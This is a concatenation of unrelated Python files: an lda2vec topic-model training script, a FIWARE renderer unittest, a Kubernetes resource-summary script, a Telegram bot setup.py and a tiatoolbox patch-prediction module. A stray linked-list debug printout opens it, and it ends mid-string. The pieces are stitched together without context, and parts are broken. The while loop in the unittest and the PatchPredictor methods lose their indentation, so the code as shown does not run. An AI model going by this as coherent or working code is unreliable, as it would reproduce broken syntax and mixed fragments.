DATA: 12 NEXT NODE: <__main__.Node object at 0x7fc19d92ebe0>
DATA: 32 NEXT NODE: None
--------------------
Length: 5
--------------------
'''
|
# Author: Chris Moody <chrisemoody@gmail.com>
# License: MIT
# This simple example loads the newsgroups data from sklearn
# and train an LDA-like model on it
import os.path
import pickle
import time
from chainer import serializers
from chainer import cuda
import chainer.optimizers as O
import chainer.link as L
import numpy as np
# from lda2vec import prepare_topics, print_top_words_per_topic
# from lda2vec import utils
from lda2vec import topics, utils
from lda import LDA
# Select the GPU from the CUDA_GPU env var (defaults to device 0).
gpu_id = int(os.getenv('CUDA_GPU', 0))
cuda.get_device(gpu_id).use()
print("Using GPU ", str(gpu_id))
# Preprocessed corpus artifacts produced by an earlier preparation step.
vocab = pickle.load(open('../data/vocab.pkl', 'rb'))
corpus = pickle.load(open('../data/corpus.pkl', 'rb'))
bow = np.load("../data/bow.npy").astype('float32')
# Remove bow counts on the first two tokens, which <SKIP> and <EOS>
bow[:, :2] = 0
# Normalize bag of words to be a probability
# bow = bow / bow.sum(axis=1)[:, None]
# Number of docs
n_docs = bow.shape[0]
# Number of unique words in the vocabulary
n_vocab = bow.shape[1]
# Number of dimensions in a single word vector
n_units = 256
# number of topics
n_topics = 20
batchsize = 128
counts = corpus.keys_counts[:n_vocab]
# Get the string representation for every compact key
words = corpus.word_list(vocab)[:n_vocab]
model = LDA(n_docs, n_topics, n_units, n_vocab)
# Resume training from a checkpoint when one exists.
if os.path.exists('lda.hdf5'):
    print("Reloading from saved")
    serializers.load_hdf5("lda.hdf5", model)
model.to_gpu()
optimizer = O.Adam()
optimizer.setup(model)
j = 0
fraction = batchsize * 1.0 / bow.shape[0]
for epoch in range(50000000):
    # Periodically print the current top words per topic for inspection.
    if epoch % 100 == 0:
        p = cuda.to_cpu(model.proportions.W.data).copy()
        f = cuda.to_cpu(model.factors.W.data).copy()
        w = cuda.to_cpu(model.embedding.W.data).copy()
        d = topics.prepare_topics(p, f, w, words)
        topics.print_top_words_per_topic(d)
    for (ids, batch) in utils.chunks(batchsize, np.arange(bow.shape[0]), bow):
        t0 = time.time()
        # optimizer.zero_grads()
        model.cleargrads()
        # rec: reconstruction loss, ld: prior/regularisation term.
        rec, ld = model.forward(ids, batch)
        l = rec + ld
        l.backward()
        optimizer.update()
        msg = ("J:{j:05d} E:{epoch:05d} L:{rec:1.3e} "
               "P:{ld:1.3e} R:{rate:1.3e}")
        l.to_cpu()
        rec.to_cpu()
        ld.to_cpu()
        t1 = time.time()
        dt = t1 - t0
        # rate = examples processed per second for this minibatch.
        rate = batchsize / dt
        logs = dict(rec=float(rec.data), epoch=epoch, j=j,
                    ld=float(ld.data), rate=rate)
        print(msg.format(**logs))
        j += 1
    # Checkpoint the model every 100 epochs.
    if epoch % 100 == 0:
        serializers.save_hdf5("lda.hdf5", model)
|
from art import logo
# Print the project's ASCII-art logo on startup.
print(logo)
|
import unittest
from os import path
import os
import shutil
import sys
import json
from subprocess import Popen, PIPE, call
import pprint
from lxml import etree, objectify
from lxml.cssselect import CSSSelector
import pprint
from pyquery import PyQuery as pq
import_path = path.abspath(__file__)
while path.split(import_path)[1] != 'fiware_api_blueprint_renderer':
import_path = path.dirname(import_path)
sys.path.append(import_path)
from src.drafter_postprocessing.order_uri import order_uri_parameters, order_request_parameters
from tests.test_utils import *
from src.renderer import main
class TestTOCJSON(unittest.TestCase):
    """Render the api_test.apib fixture and verify the generated HTML TOC.

    Python 2 test: builds the HTML once in setUpClass, then walks the
    rendered <nav id="toc"> tree comparing it against an expected nested
    structure of (text, href, subelements) entries.
    """
    __metaclass__ = TestCaseWithExamplesMetaclass
    @classmethod
    def setUpClass(cls):
        """Render the fixture once and parse the resulting HTML/JSON."""
        pathname_ = path.dirname(path.abspath(__file__))
        cls.apib_file = pathname_+"/api_test.apib"
        # NOTE(review): missing trailing slash means html_output is
        # "...f138api_test.html"; appears unused, but confirm.
        cls.tmp_result_files = "/var/tmp/test-links-in-reference-160faf1aae1dd41c8f16746ea744f138"
        cls.html_output = cls.tmp_result_files+"api_test.html"
        if os.path.exists(cls.tmp_result_files):
            shutil.rmtree(cls.tmp_result_files)
        os.makedirs(cls.tmp_result_files)
        main(["fabre", "-i", cls.apib_file, "-o",
              cls.tmp_result_files, "--no-clear-temp-dir"])
        parser = etree.HTMLParser()
        cls.tree = etree.parse(""+cls.tmp_result_files+"/api_test.html", parser)
        cls.pq = pq(filename = cls.tmp_result_files+"/api_test.html")
        with open('/var/tmp/fiware_api_blueprint_renderer_tmp/api_test.json', 'r') as f:
            cls.out_json = json.load(f)
    @classmethod
    def tearDownClass(cls):
        """Remove the rendered output directory and temp artifacts."""
        if os.path.exists(cls.tmp_result_files):
            shutil.rmtree(cls.tmp_result_files)
        to_delete = ['/var/tmp/fiware_api_blueprint_renderer_tmp/api_test.apib',
                     '/var/tmp/fiware_api_blueprint_renderer_tmp/api_test.extras',
                     '/var/tmp/fiware_api_blueprint_renderer_tmp/api_test.json']
        for filename in to_delete:
            if os.path.exists(filename):
                os.remove(filename)
    def test_TOC_HTML(self):
        """Compare the rendered TOC against the expected nested structure."""
        sel = CSSSelector('nav#toc')
        # Expected TOC: each entry is {text, href, subelements-list}.
        li_elements=[
            {"text":"FIWARE-NGSI v2 Specification",
             "href":"#API-content",
             "subelements":[]
            },
            {"text":"API Summary",
             "href":"#api-summary",
             "subelements":[]
            },
            {"text":"Specification",
             "href":"#specification",
             "subelements":[
                {"text":"Introduction",
                 "href":"#introduction",
                 "subelements":[]
                },
             ]
            },
            {"text":"Common Payload Definition",
             "href":"#common-payload-definition",
             "subelements":[]
            },
            {"text":"API Specification",
             "href":"#API_specification",
             "subelements":[
                {"text":"Group Root",
                 "href":"#resource_group_root",
                 "subelements":[
                    {"text":"GET - Action with attributes and without parent",
                     "href":"#action_action-with-attributes-and-without-parent",
                     "subelements":[]
                    }
                 ]
                },
                {"text":"Group Entities",
                 "href":"#resource_group_entities",
                 "subelements":[
                    {"text":"Resource Resource with attributes",
                     "href":"#resource_resource-with-attributes",
                     "subelements":[
                        {"text":"GET - Action without attr but with resoruce attr",
                         "href":"#action_action-without-attr-but-with-resoruce-attr",
                         "subelements":[]
                        },
                        {"text":"POST - action with attr link",
                         "href":"#action_action-with-attr-link",
                         "subelements":[]
                        }
                     ]
                    },
                    {"text":"Resource Resource with link",
                     "href":"#resource_resource-with-link",
                     "subelements":[
                        {"text":"GET - Action without attr but with resoruce link",
                         "href":"#action_action-without-attr-but-with-resoruce-link",
                         "subelements":[]
                        },
                        {"text":"POST - action with attr link",
                         "href":"#action_action-with-attr-link",
                         "subelements":[]
                        },
                        {"text":"POST - attributes in request test",
                         "href":"#action_attributes-in-request-test",
                         "subelements":[]
                        },
                        {"text":"GET - atributos con recursividad",
                         "href":"#action_atributos-con-recursividad",
                         "subelements":[]
                        },
                     ]
                    }
                 ]
                },
                {"text":"Examples",
                 "href":"#examples",
                 "subelements":[]
                }
             ]
            },
            {
             "text":"Acknowledgements",
             "href":"#acknowledgements",
             "subelements":[]
            },
            {
             "text":"References",
             "href":"#references",
             "subelements":[]
            }
        ]
        self.check_toc_with_list(self.pq("#toc>ul").children(), li_elements)
    def check_toc_with_list(self,toc_elements,list_elements):
        """Recursively match rendered TOC <li> nodes against expected entries.

        Consumes list_elements as it walks; fails if the TOC has more
        entries than expected.
        """
        for child in toc_elements:
            try:
                next_element = list_elements.pop(0)
            except IndexError as e:
                print "TOC has too many elements"
                assert False
            except Exception as e:
                print e
                assert False
            link = pq(child).children("a")
            self.assertEqual(pq(link).attr["href"], next_element["href"])
            self.assertEqual(pq(link).text().strip(), next_element["text"].strip())
            if(len(next_element["subelements"])):
                ##recursive
                self.check_toc_with_list(pq(child).children("ul").children(), next_element["subelements"])
            pass
        ##list must be empty
        # NOTE(review): leftover expected entries are only printed, not
        # asserted — a too-short TOC passes silently (message also has a
        # typo: "benn"). Consider asserting here.
        if (len(list_elements)):
            print "Some TOC elements have benn not appeared"
            print list_elements
# Run the suite directly (this module is executed as a script, not via pytest).
suite = unittest.defaultTestLoader.loadTestsFromTestCase(TestTOCJSON)
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite)
|
#!/usr/bin/env python3
from kubernetes import client, config
# Multipliers for Kubernetes resource-quantity suffixes.
# Binary suffixes (Ki/Mi/Gi/Ti) are powers of 1024; decimal (K/M/G/T) are
# powers of 1000.
k8s_sizing = {
    'Ti': 1024 ** 4,
    'T': 1000 ** 4,
    'Gi': 1024 ** 3,
    'G': 1000 ** 3,
    'Mi': 1024 ** 2,
    'M': 1000 ** 2,  # BUGFIX: was 1000 ** 0, which made "1M" equal one byte
    'Ki': 1024 ** 1,
    'K': 1000 ** 1,
}
def mem_to_bytes(k8s_size):
    """Convert a Kubernetes memory quantity (e.g. '512Mi') to bytes.

    Quantities with an unknown or missing suffix are returned as-is
    (assumed to already be bytes).
    """
    unit = ''.join(ch for ch in k8s_size if ch.isalpha())
    size = int(k8s_size.rstrip(unit))
    multiplier = k8s_sizing.get(unit.capitalize())
    if multiplier is None:
        return size
    return size * multiplier
def mem_from_bytes(size_bytes, unit):
    """Convert a byte count into the given Kubernetes unit (e.g. 'Gi')."""
    divisor = k8s_sizing[unit]
    return size_bytes / divisor
def cpu_to_cores(size):
    """Convert a Kubernetes CPU quantity to cores ('500m' -> 0.5, '2' -> 2)."""
    try:
        return int(size)
    except ValueError:
        # Millicore notation: strip the trailing 'm' and divide by 1000.
        millicores = size.rstrip('m')
        return int(millicores) / 1000
# Configs can be set in Configuration class directly or using helper utility
# load_kube_config() reads the local kubeconfig (~/.kube/config by default).
config.load_kube_config()
v1 = client.CoreV1Api()  # core/v1 API client used by the functions below
def get_request_limit_totals():
    """Sum CPU/memory requests and limits over every container in the cluster.

    Returns:
        Tuple (cpu_requests, cpu_limits, mem_requests, mem_limits) with CPU
        in cores and memory in bytes.
    """
    pods = v1.list_pod_for_all_namespaces(watch=False)
    cpu_requests = cpu_limits = 0
    mem_requests = mem_limits = 0
    for pod in pods.items:
        for container in pod.spec.containers:
            limits = container.resources.limits
            if limits is not None:
                if "cpu" in limits:
                    cpu_limits += cpu_to_cores(limits["cpu"])
                if "memory" in limits:
                    mem_limits += mem_to_bytes(limits["memory"])
            requests = container.resources.requests
            if requests is not None:
                if "cpu" in requests:
                    cpu_requests += cpu_to_cores(requests["cpu"])
                if "memory" in requests:
                    mem_requests += mem_to_bytes(requests["memory"])
    return cpu_requests, cpu_limits, mem_requests, mem_limits
def get_cluster_capacity():
    """Sum allocatable CPU (cores) and memory (bytes) across all nodes."""
    nodes = v1.list_node()
    cpu_total = sum(cpu_to_cores(node.status.allocatable["cpu"])
                    for node in nodes.items)
    mem_total = sum(mem_to_bytes(node.status.allocatable["memory"])
                    for node in nodes.items)
    return cpu_total, mem_total
# Gather cluster-wide usage totals and capacity, then render a summary table.
total_cpu_requests, total_cpu_limits, total_mem_requests, total_mem_limits = get_request_limit_totals()
total_cpu, total_memory = get_cluster_capacity()
print()
# Three rows: header, separator, data (absolute values plus percentage of
# the cluster's allocatable capacity).
for args in (
        ('CPU Requests', 'CPU Limits', 'Memory Requests', 'Memory Limits'),
        ('------------', '----------', '---------------', '-------------'),
        (
            '{} Cores ({:.0%})'.format(
                str(total_cpu_requests),
                total_cpu_requests / total_cpu
            ),
            '{} Cores ({:.0%})'.format(
                str(total_cpu_limits),
                total_cpu_limits / total_cpu
            ),
            '{}Gi ({:.0%})'.format(
                str(mem_from_bytes(total_mem_requests, 'Gi')),
                total_mem_requests / total_memory
            ),
            '{}Gi ({:.0%})'.format(
                str(mem_from_bytes(total_mem_limits, 'Gi')),
                total_mem_limits / total_memory
            )
        )
):
    print('{0:<30} {1:<30} {2:<30} {3:<30}'.format(*args))
|
from setuptools import setup, find_packages
# Packaging metadata for the telegram-media-bot distribution.
setup(
    name='telegram-media-bot',
    version="2.1",
    packages=find_packages(),
    scripts=['telegram-media-bot/telegram-media-bot.py'],
    # NOTE(review): praw is pinned to <=3.6.0 (pre-4.x API) — confirm intended.
    install_requires=['tweepy>=3.5.0', 'praw<=3.6.0', 'requests>=2.12.3'],
    author='Murat Özel',
    description='Send pictures and videos from Twitter and Reddit to a Telegram-Chat',
    license='MIT',
    keywords='reddit telegram twitter',
    url="https://blog.yamahi.eu",
)
|
"""This module implements patch-level prediction."""
import copy
import os
import pathlib
import warnings
from collections import OrderedDict
from typing import Callable, Tuple, Union
import numpy as np
import torch
import tqdm
from tiatoolbox.models.architecture import get_pretrained_model
from tiatoolbox.models.dataset.classification import PatchDataset, WSIPatchDataset
from tiatoolbox.models.engine.semantic_segmentor import IOSegmentorConfig
from tiatoolbox.utils import misc
from tiatoolbox.utils.misc import save_as_json
from tiatoolbox.wsicore.wsireader import VirtualWSIReader, get_wsireader
class IOPatchPredictorConfig(IOSegmentorConfig):
    """Contain patch predictor input and output information."""

    def __init__(
        self,
        patch_input_shape=None,
        input_resolutions=None,
        stride_shape=None,
        **kwargs,
    ):
        # Default the stride to the patch size, i.e. non-overlapping patches.
        if stride_shape is None:
            stride_shape = patch_input_shape
        # Patch prediction produces no spatial output maps, hence the empty
        # output resolutions and output shape equal to the input shape.
        super().__init__(
            input_resolutions=input_resolutions,
            output_resolutions=[],
            stride_shape=stride_shape,
            patch_input_shape=patch_input_shape,
            patch_output_shape=patch_input_shape,
            save_resolution=None,
            **kwargs,
        )
class PatchPredictor:
"""Patch-level predictor.
The models provided by tiatoolbox should give the following results:
.. list-table:: PatchPredictor performance on the Kather100K dataset [1]
:widths: 15 15
:header-rows: 1
* - Model name
- F\ :sub:`1`\ score
* - alexnet-kather100k
- 0.965
* - resnet18-kather100k
- 0.990
* - resnet34-kather100k
- 0.991
* - resnet50-kather100k
- 0.989
* - resnet101-kather100k
- 0.989
* - resnext50_32x4d-kather100k
- 0.992
* - resnext101_32x8d-kather100k
- 0.991
* - wide_resnet50_2-kather100k
- 0.989
* - wide_resnet101_2-kather100k
- 0.990
* - densenet121-kather100k
- 0.993
* - densenet161-kather100k
- 0.992
* - densenet169-kather100k
- 0.992
* - densenet201-kather100k
- 0.991
* - mobilenet_v2-kather100k
- 0.990
* - mobilenet_v3_large-kather100k
- 0.991
* - mobilenet_v3_small-kather100k
- 0.992
* - googlenet-kather100k
- 0.992
.. list-table:: PatchPredictor performance on the PCam dataset [2]
:widths: 15 15
:header-rows: 1
* - Model name
- F\ :sub:`1`\ score
* - alexnet-pcam
- 0.840
* - resnet18-pcam
- 0.888
* - resnet34-pcam
- 0.889
* - resnet50-pcam
- 0.892
* - resnet101-pcam
- 0.888
* - resnext50_32x4d-pcam
- 0.900
* - resnext101_32x8d-pcam
- 0.892
* - wide_resnet50_2-pcam
- 0.901
* - wide_resnet101_2-pcam
- 0.898
* - densenet121-pcam
- 0.897
* - densenet161-pcam
- 0.893
* - densenet169-pcam
- 0.895
* - densenet201-pcam
- 0.891
* - mobilenet_v2-pcam
- 0.899
* - mobilenet_v3_large-pcam
- 0.895
* - mobilenet_v3_small-pcam
- 0.890
* - googlenet-pcam
- 0.867
Args:
model (nn.Module):
Use externally defined PyTorch model for prediction with.
weights already loaded. Default is `None`. If provided,
`pretrained_model` argument is ignored.
pretrained_model (str):
Name of the existing models support by tiatoolbox for
processing the data. For a full list of pretrained models,
refer to the `docs
<https://tia-toolbox.readthedocs.io/en/latest/pretrained.html>`_
By default, the corresponding pretrained weights will also
be downloaded. However, you can override with your own set
of weights via the `pretrained_weights` argument. Argument
is case-insensitive.
pretrained_weights (str):
Path to the weight of the corresponding `pretrained_model`.
>>> predictor = PatchPredictor(
... pretrained_model="resnet18-kather100k",
... pretrained_weights="resnet18_local_weight")
batch_size (int):
Number of images fed into the model each time.
num_loader_workers (int):
Number of workers to load the data. Take note that they will
also perform preprocessing.
verbose (bool):
Whether to output logging information.
Attributes:
img (:obj:`str` or :obj:`pathlib.Path` or :obj:`numpy.ndarray`):
A HWC image or a path to WSI.
mode (str):
Type of input to process. Choose from either `patch`, `tile`
or `wsi`.
model (nn.Module):
Defined PyTorch model.
pretrained_model (str):
Name of the existing models support by tiatoolbox for
processing the data. For a full list of pretrained models,
refer to the `docs
<https://tia-toolbox.readthedocs.io/en/latest/pretrained.html>`_
By default, the corresponding pretrained weights will also
be downloaded. However, you can override with your own set
of weights via the `pretrained_weights` argument. Argument
is case insensitive.
batch_size (int):
Number of images fed into the model each time.
num_loader_workers (int):
Number of workers used in torch.utils.data.DataLoader.
verbose (bool):
Whether to output logging information.
Examples:
>>> # list of 2 image patches as input
>>> data = [img1, img2]
>>> predictor = PatchPredictor(pretrained_model="resnet18-kather100k")
>>> output = predictor.predict(data, mode='patch')
>>> # array of list of 2 image patches as input
>>> data = np.array([img1, img2])
>>> predictor = PatchPredictor(pretrained_model="resnet18-kather100k")
>>> output = predictor.predict(data, mode='patch')
>>> # list of 2 image patch files as input
>>> data = ['path/img.png', 'path/img.png']
>>> predictor = PatchPredictor(pretrained_model="resnet18-kather100k")
>>> output = predictor.predict(data, mode='patch')
>>> # list of 2 image tile files as input
>>> tile_file = ['path/tile1.png', 'path/tile2.png']
>>> predictor = PatchPredictor(pretraind_model="resnet18-kather100k")
>>> output = predictor.predict(tile_file, mode='tile')
>>> # list of 2 wsi files as input
>>> wsi_file = ['path/wsi1.svs', 'path/wsi2.svs']
>>> predictor = PatchPredictor(pretraind_model="resnet18-kather100k")
>>> output = predictor.predict(wsi_file, mode='wsi')
References:
[1] Kather, Jakob Nikolas, et al. "Predicting survival from colorectal cancer
histology slides using deep learning: A retrospective multicenter study."
PLoS medicine 16.1 (2019): e1002730.
[2] Veeling, Bastiaan S., et al. "Rotation equivariant CNNs for digital
pathology." International Conference on Medical image computing and
computer-assisted intervention. Springer, Cham, 2018.
""" # noqa: W605
def __init__(
    self,
    batch_size=8,
    num_loader_workers=0,
    model=None,
    pretrained_model=None,
    pretrained_weights=None,
    verbose=True,
):
    """Initialize the patch predictor.

    Either `model` or `pretrained_model` must be provided; see the
    class docstring for the meaning of each argument.
    """
    super().__init__()

    self.imgs = None
    self.mode = None

    if model is None and pretrained_model is None:
        raise ValueError("Must provide either `model` or `pretrained_model`.")

    # An explicitly supplied model carries no IO configuration of its own;
    # a pretrained model comes bundled with one.
    ioconfig = None  # TODO: could an iostate be retrieved from a user model?
    if model is None:
        model, ioconfig = get_pretrained_model(pretrained_model, pretrained_weights)

    self.ioconfig = ioconfig  # original configuration, kept pristine
    self._ioconfig = None  # runtime copy, possibly mutated per `predict` call
    self.model = model  # runtime model, e.g. after wrapping with nn.DataParallel
    self.pretrained_model = pretrained_model
    self.batch_size = batch_size
    self.num_loader_worker = num_loader_workers
    self.verbose = verbose
@staticmethod
def merge_predictions(
    img: Union[str, pathlib.Path, np.ndarray],
    output: dict,
    resolution: float = None,
    units: str = None,
    postproc_func: Callable = None,
    return_raw: bool = False,
):
    """Merge patch-level predictions to form a 2-dimensional prediction map.

    The merged map contains values from 0 to N, where N is the number
    of classes: 0 marks background that was never covered by a patch,
    and 1..N are the (shifted) class indices predicted by the model.

    Args:
        img (:obj:`str` or :obj:`pathlib.Path` or :class:`numpy.ndarray`):
            A HWC image or a path to WSI.
        output (dict):
            Output generated by the model. Expected keys are
            `coordinates`, `resolution`, `units` and either
            `probabilities` or `predictions`.
        resolution (float):
            Resolution of merged predictions.
        units (str):
            Units of resolution used when merging predictions. This
            must be the same `units` used when processing the data.
        postproc_func (callable):
            A function to post-process raw prediction from model. By
            default, internal code uses the `np.argmax` function.
        return_raw (bool):
            Return raw result without applying the `postproc_func`
            on the assembled image.

    Returns:
        :class:`numpy.ndarray`:
            Merged predictions as a 2D array.

    Examples:
        >>> # pseudo output dict from model with 2 patches
        >>> output = {
        ...     'resolution': 1.0,
        ...     'units': 'baseline',
        ...     'probabilities': [[0.45, 0.55], [0.90, 0.10]],
        ...     'predictions': [1, 0],
        ...     'coordinates': [[0, 0, 2, 2], [2, 2, 4, 4]],
        ... }
        >>> merged = PatchPredictor.merge_predictions(
        ...     np.zeros([4, 4]),
        ...     output,
        ...     resolution=1.0,
        ...     units='baseline'
        ... )
        >>> merged
        ... array([[2, 2, 0, 0],
        ...        [2, 2, 0, 0],
        ...        [0, 0, 1, 1],
        ...        [0, 0, 1, 1]])

    """
    reader = get_wsireader(img)
    if isinstance(reader, VirtualWSIReader):
        # Non-pyramidal images can only be read at their native scale,
        # so the requested resolution/units are overridden.
        warnings.warn(
            (
                "Image is not pyramidal hence read is forced to be "
                "at `units='baseline'` and `resolution=1.0`."
            )
        )
        resolution = 1.0
        units = "baseline"

    canvas_shape = reader.slide_dimensions(resolution=resolution, units=units)
    canvas_shape = canvas_shape[::-1]  # XY to YX

    # may crash here, do we need to deal with this ?
    output_shape = reader.slide_dimensions(
        resolution=output["resolution"], units=output["units"]
    )
    output_shape = output_shape[::-1]  # XY to YX
    # Scale factor mapping patch coordinates (at processing resolution)
    # onto the merge canvas (at the requested resolution).
    fx = np.array(canvas_shape) / np.array(output_shape)

    if "probabilities" not in output.keys():
        # Hard class labels only: paint them directly, no averaging.
        coordinates = output["coordinates"]
        predictions = output["predictions"]
        denominator = None
        output = np.zeros(list(canvas_shape), dtype=np.float32)
    else:
        # Per-class probabilities: accumulate and count overlaps so
        # overlapping patches can be averaged afterwards.
        coordinates = output["coordinates"]
        predictions = output["probabilities"]
        num_class = np.array(predictions[0]).shape[0]
        denominator = np.zeros(canvas_shape)
        output = np.zeros(list(canvas_shape) + [num_class], dtype=np.float32)

    for idx, bound in enumerate(coordinates):
        prediction = predictions[idx]
        # assumed to be in XY
        # top-left for output placement
        tl = np.ceil(np.array(bound[:2]) * fx).astype(np.int32)
        # bot-right for output placement
        br = np.ceil(np.array(bound[2:]) * fx).astype(np.int32)
        output[tl[1] : br[1], tl[0] : br[0]] = prediction
        if denominator is not None:
            denominator[tl[1] : br[1], tl[0] : br[0]] += 1

    # deal with overlapping regions
    if denominator is not None:
        output = output / (np.expand_dims(denominator, -1) + 1.0e-8)
        if not return_raw:
            # convert raw probabilities to predictions
            if postproc_func is not None:
                output = postproc_func(output)
            else:
                output = np.argmax(output, axis=-1)
            # to make sure background is 0 while class will be 1..N
            output[denominator > 0] += 1
    return output
def _predict_engine(
    self,
    dataset,
    return_probabilities=False,
    return_labels=False,
    return_coordinates=False,
    on_gpu=True,
):
    """Make a prediction on a dataset. The dataset may be mutated.

    Args:
        dataset (torch.utils.data.Dataset):
            PyTorch dataset object created using
            `tiatoolbox.models.data.classification.Patch_Dataset`.
        return_probabilities (bool):
            Whether to return per-class probabilities.
        return_labels (bool):
            Whether to return labels.
        return_coordinates (bool):
            Whether to return patch coordinates.
        on_gpu (bool):
            Whether to run model on the GPU.

    Returns:
        :class:`numpy.ndarray`:
            Model predictions of the input dataset.

    """
    # Preprocessing must travel with the dataset: it is applied by the
    # dataset itself, not by the loader or the model.
    dataset.preproc_func = self.model.preproc_func

    loader = torch.utils.data.DataLoader(
        dataset,
        num_workers=self.num_loader_worker,
        batch_size=self.batch_size,
        drop_last=False,
        shuffle=False,
    )

    pbar = None
    if self.verbose:
        pbar = tqdm.tqdm(
            total=int(len(loader)), leave=True, ncols=80, ascii=True, position=0
        )

    # use external for testing
    model = misc.model_to(on_gpu, self.model)

    results = {
        "probabilities": [],
        "predictions": [],
        "coordinates": [],
        "labels": [],
    }
    for batch_data in loader:
        batch_probabilities = self.model.infer_batch(
            model, batch_data["image"], on_gpu
        )
        # Index of the class with the maximum probability.
        batch_predictions = self.model.postproc_func(batch_probabilities)

        # tolist might be very expensive
        results["probabilities"].extend(batch_probabilities.tolist())
        results["predictions"].extend(batch_predictions.tolist())
        if return_coordinates:
            results["coordinates"].extend(batch_data["coords"].tolist())
        if return_labels:  # be careful of `s`
            # No tolist here: labels may be of mixed types and are hence
            # collated as a plain list by torch.
            results["labels"].extend(list(batch_data["label"]))

        if pbar is not None:
            pbar.update()
    if pbar is not None:
        pbar.close()

    # Strip out whatever the caller did not ask for.
    for key, wanted in (
        ("probabilities", return_probabilities),
        ("labels", return_labels),
        ("coordinates", return_coordinates),
    ):
        if not wanted:
            results.pop(key)
    return results
def predict(
    self,
    imgs,
    masks=None,
    labels=None,
    mode="patch",
    return_probabilities=False,
    return_labels=False,
    on_gpu=True,
    ioconfig: IOPatchPredictorConfig = None,
    patch_input_shape: Tuple[int, int] = None,
    stride_shape: Tuple[int, int] = None,
    resolution=None,
    units=None,
    merge_predictions=False,
    save_dir=None,
    save_output=False,
):
    """Make a prediction for a list of input data.

    Args:
        imgs (list, ndarray):
            List of inputs to process. When using `patch` mode, the
            input must be either a list of images, a list of image
            file paths or a numpy array of an image list. When using
            `tile` or `wsi` mode, the input must be a list of file
            paths.
        masks (list):
            List of masks. Only utilised when processing image tiles
            and whole-slide images. Patches are only processed if
            they are within a masked area. If not provided, then a
            tissue mask will be automatically generated for
            whole-slide images or the entire image is processed for
            image tiles.
        labels:
            List of labels. If using `tile` or `wsi` mode, then only
            a single label per image tile or whole-slide image is
            supported.
        mode (str):
            Type of input to process. Choose from either `patch`,
            `tile` or `wsi`.
        return_probabilities (bool):
            Whether to return per-class probabilities.
        return_labels (bool):
            Whether to return the labels with the predictions.
        on_gpu (bool):
            Whether to run model on the GPU.
        ioconfig (IOPatchPredictorConfig):
            IO configuration to use; takes precedence over the
            individual shape/resolution arguments below.
        patch_input_shape (tuple):
            Size of patches input to the model. Patches are at
            requested read resolution, not with respect to level 0,
            and must be positive.
        stride_shape (tuple):
            Stride used during tile and WSI processing. Stride is
            at requested read resolution, not with respect to
            level 0, and must be positive. If not provided,
            `stride_shape=patch_input_shape`.
        resolution (float):
            Resolution used for reading the image. Please see
            :obj:`WSIReader` for details.
        units (str):
            Units of resolution used for reading the image. Choose
            from either `level`, `power` or `mpp`. Please see
            :obj:`WSIReader` for details.
        merge_predictions (bool):
            Whether to merge the predictions to form a 2-dimensional
            map. This is only applicable for `mode='wsi'` or
            `mode='tile'`.
        save_dir (str or pathlib.Path):
            Output directory when processing multiple tiles and
            whole-slide images. By default, it is folder `output`
            where the running script is invoked.
        save_output (bool):
            Whether to save output for a single file. default=False

    Returns:
        (:class:`numpy.ndarray`, dict):
            Model predictions of the input dataset. If multiple
            image tiles or whole-slide images are provided as input,
            or save_output is True, then results are saved to
            `save_dir` and a dictionary indicating save location for
            each input is returned. The dict has the following format:

            - img_path: path of the input image.
            - raw: path to save location for raw prediction,
              saved in .json.
            - merged: path to .npy containing merged
              predictions if `merge_predictions` is `True`.

    Raises:
        ValueError:
            If `mode` is invalid, if label/mask counts do not match
            `imgs`, or if no IO configuration can be derived.

    Examples:
        >>> wsis = ['wsi1.svs', 'wsi2.svs']
        >>> predictor = PatchPredictor(
        ...     pretrained_model="resnet18-kather100k")
        >>> output = predictor.predict(wsis, mode="wsi")
        >>> output.keys()
        ... ['wsi1.svs', 'wsi2.svs']
        >>> output['wsi1.svs']
        ... {'raw': '0.raw.json', 'merged': '0.merged.npy'}
        >>> output['wsi2.svs']
        ... {'raw': '1.raw.json', 'merged': '1.merged.npy'}

    """
    if mode not in ["patch", "wsi", "tile"]:
        raise ValueError(
            f"{mode} is not a valid mode. Use either `patch`, `tile` or `wsi`"
        )
    if mode == "patch" and labels is not None:
        # if a labels is provided, then return with the prediction
        return_labels = bool(labels)
        if len(labels) != len(imgs):
            raise ValueError(
                f"len(labels) != len(imgs) : " f"{len(labels)} != {len(imgs)}"
            )
    if mode == "wsi" and masks is not None and len(masks) != len(imgs):
        raise ValueError(
            f"len(masks) != len(imgs) : " f"{len(masks)} != {len(imgs)}"
        )

    if mode == "patch":
        # don't return coordinates if patches are already extracted
        return_coordinates = False
        dataset = PatchDataset(imgs, labels)
        return self._predict_engine(
            dataset, return_probabilities, return_labels, return_coordinates, on_gpu
        )

    # --- `tile` / `wsi` mode from here on ---
    if stride_shape is None:
        stride_shape = patch_input_shape

    # Derive an IO configuration: either all three of shape/resolution/units
    # are given, or a stored/passed ioconfig is used (and selectively
    # overridden by whichever arguments were supplied).
    make_config_flag = (
        patch_input_shape is None,
        resolution is None,
        units is None,
    )
    if ioconfig is None and self.ioconfig is None and any(make_config_flag):
        raise ValueError(
            "Must provide either `ioconfig` or "
            "`patch_input_shape`, `resolution`, and `units`."
        )
    if ioconfig is None and self.ioconfig:
        # Deep copy so per-call overrides never touch the stored original.
        ioconfig = copy.deepcopy(self.ioconfig)
        if patch_input_shape is not None:
            ioconfig.patch_input_shape = patch_input_shape
        if stride_shape is not None:
            ioconfig.stride_shape = stride_shape
        if resolution is not None:
            ioconfig.input_resolutions[0]["resolution"] = resolution
        if units is not None:
            ioconfig.input_resolutions[0]["units"] = units
    elif ioconfig is None and all(not v for v in make_config_flag):
        ioconfig = IOPatchPredictorConfig(
            input_resolutions=[{"resolution": resolution, "units": units}],
            patch_input_shape=patch_input_shape,
            stride_shape=stride_shape,
        )

    # Find the highest input resolution; merged predictions and saved
    # metadata are reported at this resolution.
    fx_list = ioconfig.scale_to_highest(
        ioconfig.input_resolutions, ioconfig.input_resolutions[0]["units"]
    )
    fx_list = zip(fx_list, ioconfig.input_resolutions)
    fx_list = sorted(fx_list, key=lambda x: x[0])
    highest_input_resolution = fx_list[0][1]

    if mode == "tile":
        warnings.warn(
            "WSIPatchDataset only reads image tile at "
            '`units="baseline"`. Resolutions will be converted '
            "to baseline value."
        )
        ioconfig = ioconfig.to_baseline()

    # Fix: this warning block was previously duplicated verbatim and the
    # same warning was emitted twice per call; warn once only.
    if len(imgs) > 1:
        warnings.warn(
            "When providing multiple whole-slide images / tiles, "
            "we save the outputs and return the locations "
            "to the corresponding files."
        )
        if save_dir is None:
            warnings.warn(
                "> 1 WSIs detected but there is no save directory set."
                "All subsequent output will be saved to current runtime"
